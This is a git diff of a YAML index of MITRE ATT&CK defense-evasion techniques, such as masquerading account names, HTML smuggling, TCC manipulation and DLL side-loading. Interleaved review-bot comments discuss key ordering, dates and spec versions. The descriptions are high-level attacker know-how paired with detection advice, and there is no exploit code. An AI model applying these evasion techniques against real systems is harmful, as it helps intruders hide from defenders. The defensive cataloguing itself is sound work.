Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -11974,33 +12225,84 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
- T1556.001:
+ T1036.010:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-10-17T15:20:36.705Z'
+ name: Masquerade Account Name
+ description: "Adversaries may match or approximate the names of legitimate accounts
+ to make newly created ones appear benign. This will typically occur during
+ [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+ may also be renamed at a later date. This may also coincide with [Account
+ Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+ deletes an account before re-creating one with the same name.(Citation: Huntress
+ MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+ such as those associated with legitimate software, data backups, or container
+ cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+ Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+ such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+ 2024) Sometimes adversaries may model account names off of those already existing
+ in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+ \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+ which describes impersonating specific trusted individuals or organizations,
+ rather than user or service account names. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Menachem Goldstein
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - IaaS
+ - Containers
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Creation'
type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
+ id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+ created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1036/010
+ external_id: T1036.010
+ - source_name: Elastic CUBA Ransomware 2022
+ description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+ Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+ August 5, 2024.
+ url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+ - source_name: Invictus IR Cloud Ransomware 2024
+ description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+ August 5, 2024.
+ url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+ - source_name: Huntress MOVEit 2023
+ description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+ CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+ url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+ - source_name: Aquasec Kubernetes Attack 2023
+ description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+ Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+ 2023.
+ url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.001:
+ technique:
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
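Review bot: the T1036.010 description string ends with `\ \n\n` and a trailing space before the closing quote (`...service account names. "`), upstream whitespace artefacts that the YAML emitter preserved verbatim; trimming trailing whitespace on description strings in the generator would stop them propagating into every regenerated file. The rest of the new entry is consistent: the kill chain phase, platforms and the 'User Account: User Account Creation' data source match a defense-evasion sub-technique of T1036.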
@@ -12021,6 +12323,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -12035,22 +12338,42 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.006:
technique:
- modified: '2023-07-14T14:01:41.475Z'
+ modified: '2024-09-12T19:12:13.006Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -12108,48 +12431,17 @@ defense-evasion:
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved May 20, 2021.
- url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+ Explorer/Edge. Retrieved September 12, 2024.
+ url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.006
atomic_tests: []
T1556.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
- type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -12171,6 +12463,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -12181,23 +12474,50 @@ defense-evasion:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:43:18.873Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -12238,8 +12558,9 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
- description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
- url: https://twitter.com/rfackroyd/status/1639136000755765254
+ description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+ 2024.
+ url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
@@ -12275,43 +12596,23 @@ defense-evasion:
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1070.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Walker Johnson
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
- created: '2020-01-31T12:35:36.479Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1070.004
- url: https://attack.mitre.org/techniques/T1070/004
- - source_name: Microsoft SDelete July 2016
- url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
- description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
- 8, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:33:59.107Z'
+ name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del
on Windows and rm
or unlink
on Linux and macOS.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Indicator Removal on Host: File Deletion'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_deprecated: false
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
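Review bot: the T1070.004 block is deleted and re-emitted with every key in a different order, so a change that amounts to a new `modified`, the dropped `spec_version: '2.1'` and a spec bump shows up as dozens of changed lines; have the generator dump keys in a fixed order (or sort them) so regenerations diff cleanly. Since `spec_version` is removed from every technique in this file, the commit message should state that dropping it is intentional and which ATT&CK release the index was rebuilt from. Separately, the unchanged description context ('functions include del / on Windows and rm / or unlink') shows the inline code names split onto their own lines, which suggests inline markup was stripped when the description was imported; not introduced here, but worth a look at the importer.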
@@ -12322,18 +12623,36 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Deletion'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+ created: '2020-01-31T12:35:36.479Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/004
+ external_id: T1070.004
+ - source_name: Microsoft SDelete July 2016
+ description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+ 8, 2018.
+ url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.004
atomic_tests: []
T1221:
@@ -12395,7 +12714,7 @@ defense-evasion:
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
source_name: ryhanson phishery SEPT 2016
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-12T18:16:56.176Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
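Review bot: `modified` for T1221 moves backwards here, from '2022-05-11T14:00:00.188Z' to '2022-01-12T18:16:56.176Z', and the same regression recurs in later hunks (T1134 2023-05-09 to 2023-03-30, T1564.005 2021-04-29 to 2020-06-29, T1055.005 2022-04-25 to 2021-10-18, T1622 2022-05-11 to 2022-04-16, T1574.002, T1055.008, T1027.007). A regenerated index should not date objects earlier than the previous one unless the old values were release-wide stamps rather than per-object edit times; confirm where the new values come from and note it in the commit message, because anything that diffs this index on `modified` to detect updated techniques will otherwise flag all of these as changes.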
@@ -12425,13 +12744,11 @@ defense-evasion:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1221
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -12528,7 +12845,6 @@ defense-evasion:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1027.002:
technique:
@@ -12591,7 +12907,6 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1027.002
atomic_tests: []
T1564.005:
@@ -12629,7 +12944,7 @@ defense-evasion:
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-29T15:12:11.024Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12656,8 +12971,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1055.005:
technique:
@@ -12685,7 +12998,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12729,8 +13042,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1622:
technique:
@@ -12785,7 +13096,7 @@ defense-evasion:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -12805,7 +13116,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1036.006:
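Review bot: T1622 keeps `x_mitre_attack_spec_version: 2.1.0` and only loses `spec_version: '2.1'`, while other entries in this diff are bumped to 3.2.0 (T1027.010, T1070.004) or stay at 3.1.0 (T1036.006). If the index was regenerated from one ATT&CK bundle the mix reflects per-object values and is fine; if it was merged from several sources the stale spec values should be reconciled. Either way, say which in the commit message.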
@@ -12855,7 +13165,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1036.006
atomic_tests: []
T1550.002:
@@ -12910,12 +13219,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -12965,12 +13273,11 @@ defense-evasion:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1216.002:
technique:
- modified: '2024-04-18T23:51:40.464Z'
+ modified: '2024-09-12T19:42:21.547Z'
name: SyncAppvPublishingServer
description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13030,8 +13337,8 @@ defense-evasion:
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
- Retrieved February 6, 2024.
- url: https://twitter.com/monoxgas/status/895045566090010624
+ Retrieved September 12, 2024.
+ url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
@@ -13048,37 +13355,18 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
